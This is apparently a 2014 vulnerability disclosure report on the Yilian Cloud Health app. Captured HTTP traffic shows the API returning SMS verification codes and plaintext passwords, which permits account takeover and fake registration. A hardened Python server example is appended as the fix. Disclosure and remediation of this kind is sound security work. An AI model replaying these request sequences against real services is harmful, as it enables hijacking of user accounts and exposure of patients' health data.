2014-09-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-11-06: The vendor has proactively ignored the vulnerability; details disclosed to the public.
The app's developer is hard to identify; the known information is listed below.
App name: 医联云健康 (Yilian Cloud Health) app
Download URL: http://apk.91.com/Soft/Android/cn.zgjkw.ydyl.dz-4.html
SMS sender: 泰福健康 (Taifu Health), http://www.taivex.org/
Issue screen 1: Forgot password. To reset, the user enters a phone number, obtains a verification code, and once the code is verified the password is sent by SMS. Problem: once a user's phone number has been guessed by brute force, the verification code and the login password can both be obtained by capturing the app's traffic.
Issue screen 2: Registration. Registration requires entering an SMS verification code. Problem: the verification code can be obtained by capturing the app's traffic.
Issue screen 1: Forgot password
Enter the phone number and request the verification code.
The response already contains the verification code, 7358:
GET /BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...phone number omitted...6 HTTP/1.1
Host: ylyjk.taivex.org:81
...omitted...

HTTP/1.1 200 OK
...omitted...

{"code":"0","data":{"checkcode":"7358"},"header":{"action":"GetMobileCheckCode","errreason":"","requestseq":"0"}}
Enter the code.
Submitting it returns the password, wooyun8899:
GET /BSoftNew.svc/GetUserPasswordByCheckCode?messagetype=1&checkcode=7358&mobile=156...phone number omitted...6 HTTP/1.1
Host: ylyjk.taivex.org:81
...omitted...

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 126
Content-Type: text/plain
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 22 Sep 2014 05:59:58 GMT

{"code":"0","data":{"password":"wooyun8899"},"header":{"action":"GetUserPasswordByCheckCode","errreason":"","requestseq":"0"}}
Login succeeds with that password:
GET /BSoftNew.svc/Login?username=156...omitted...6&DevID=8...omitted...0&OS=2&logintype=2&DevType=GT-I9128E&ClientVer=1.2.2&password=wooyun8899&DevVer=4.2.2 HTTP/1.1
Host: ylyjk.taivex.org:81
...omitted...

HTTP/1.1 200 OK
...omitted...

{"code":"0","data":{"token":"...omitted...","usertype":"2","stunumber":"","stucode":"","mobile":"156...omitted...6","userkey":"","ver":"1.0","sn":"0...omitted...2","psn":"0...omitted...2","name":"æ³°ç¦å»è","hoscode":"","squcode":"","hisucode":"","servercurticks":"1...omitted...4","idcard":"","realname":"156...omitted...6","logo":"","sex":"","sign":"156...omitted...6","cardnumber":"","birthday":"","header":"","medicalcard":"","outpatientcard":"","patientid":"9...omitted...2","username":"156...omitted...6","orgcode":"0...omitted...8","password":"wooyun8899","userid":"2...omitted...8","appmodule":""},"header":{"action":"Login","errreason":"","requestseq":"0","servercurticks":"1...omitted...4"}}
Issue screen 2: Registration
After tapping Register, the verification code is returned directly in the response, so the phone is bypassed entirely:
GET /BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...phone number omitted...7 HTTP/1.1
Host: ylyjk.taivex.org:81
...omitted...

HTTP/1.1 200 OK
...omitted...

{"code":"0","data":{"checkcode":"5821"},"header":{"action":"GetMobileCheckCode","errreason":"","requestseq":"0"}}
Enter the verification code.
Registration succeeds:
GET /BSoftNew.svc/AddMobileUser?password=pentest&checkcode=5821&mobile=156...phone number omitted...7 HTTP/1.1
Host: ylyjk.taivex.org:81
...omitted...

HTTP/1.1 200 OK
...omitted...

{"code":"0","data":{},"header":{"action":"AddMobileUser","errreason":"","requestseq":"0"}}
Same as above.
Do not return the verification code or the password in any API response. The code should reach the user only through the SMS channel, and a successful check should yield a short-lived reset token rather than the stored password.
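The remediation above, shown as an added example that is not part of the original report and not the vendor's code: a hardened server-side version of the three endpoints seen in the captures, written in Python. Everything in it is an assumed design. The SMS gateway is a stand-in callable, the five-minute code lifetime, the ten-minute token lifetime and the five-guess cap are illustrative policies, and the method names mirror the captured actions but are not the vendor's API. The points it demonstrates are that the "get code" response carries no code, that a correct code yields a one-time reset token instead of the password, and that passwords are stored as salted PBKDF2 hashes so they cannot be sent back at all.

```python
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 300    # assumed policy: a code lives five minutes
TOKEN_TTL_SECONDS = 600   # assumed policy: a reset token lives ten minutes
MAX_ATTEMPTS = 5          # assumed policy: guesses allowed per issued code
PBKDF2_ROUNDS = 100_000


def _response(action, ok, data=None, reason=""):
    """Same JSON envelope shape as the captures, but never carrying a secret."""
    return {"code": "0" if ok else "1", "data": data or {},
            "header": {"action": action, "errreason": reason, "requestseq": "0"}}


class AccountService:
    """Hypothetical back end: in-memory stores, injectable clock and SMS sender."""

    def __init__(self, sms_sender, clock=time.time):
        self._sms_send = sms_sender        # callable(mobile, text); stand-in gateway
        self._clock = clock                # injectable so expiry can be tested
        self._hmac_key = secrets.token_bytes(32)
        self._pending_codes = {}           # mobile -> {"mac", "expires", "attempts"}
        self._reset_tokens = {}            # token -> {"mobile", "expires"}
        self._users = {}                   # mobile -> {"salt", "pw_hash"}

    def _code_mac(self, mobile, code):
        # Only a keyed hash of the code is kept server-side, never the code itself.
        return hmac.new(self._hmac_key, f"{mobile}:{code}".encode(), hashlib.sha256).digest()

    def get_mobile_check_code(self, mobile):
        """Issue a code; it goes out by SMS only and the API response omits it."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._pending_codes[mobile] = {"mac": self._code_mac(mobile, code),
                                       "expires": self._clock() + CODE_TTL_SECONDS,
                                       "attempts": 0}
        self._sms_send(mobile, f"Your verification code is {code}")
        return _response("GetMobileCheckCode", True)

    def _consume_code(self, mobile, submitted):
        """Constant-time comparison with expiry, attempt cap and single use."""
        rec = self._pending_codes.get(mobile)
        if rec is None or self._clock() > rec["expires"]:
            self._pending_codes.pop(mobile, None)
            return False
        rec["attempts"] += 1
        if rec["attempts"] > MAX_ATTEMPTS:
            del self._pending_codes[mobile]
            return False
        if not hmac.compare_digest(rec["mac"], self._code_mac(mobile, submitted)):
            return False
        del self._pending_codes[mobile]    # a code is good for one success only
        return True

    def _store_password(self, mobile, password):
        salt = secrets.token_bytes(16)
        pw_hash = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        self._users[mobile] = {"salt": salt, "pw_hash": pw_hash}

    def add_mobile_user(self, mobile, checkcode, password):
        """Registration: the code must have arrived on the phone, not in a response."""
        if mobile in self._users or not self._consume_code(mobile, checkcode):
            return _response("AddMobileUser", False, reason="invalid or expired code")
        self._store_password(mobile, password)
        return _response("AddMobileUser", True)

    def get_reset_token_by_check_code(self, mobile, checkcode):
        """Replaces GetUserPasswordByCheckCode: hands out a one-time token, never a password."""
        if mobile not in self._users or not self._consume_code(mobile, checkcode):
            return _response("GetResetToken", False, reason="invalid or expired code")
        token = secrets.token_urlsafe(32)
        self._reset_tokens[token] = {"mobile": mobile,
                                     "expires": self._clock() + TOKEN_TTL_SECONDS}
        return _response("GetResetToken", True, {"resettoken": token})

    def set_password_by_token(self, token, new_password):
        """Second step of the reset: the token is consumed whether or not it is valid."""
        rec = self._reset_tokens.pop(token, None)
        if rec is None or self._clock() > rec["expires"]:
            return _response("SetPassword", False, reason="invalid or expired token")
        self._store_password(rec["mobile"], new_password)
        return _response("SetPassword", True)

    def login(self, mobile, password):
        user = self._users.get(mobile)
        if user is None:
            return False
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), user["salt"], PBKDF2_ROUNDS)
        return hmac.compare_digest(candidate, user["pw_hash"])
```

The same generic error is returned whether the phone number is unknown, the code is wrong, the code has expired or the guess cap was hit, so the reset endpoint does not confirm which numbers are registered. Because only an HMAC of the code and a PBKDF2 hash of the password are stored, neither value exists on the server in a form that could be echoed back, which is the structural fix for the captures above.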
Status: unable to contact the vendor, or the vendor actively refused the report.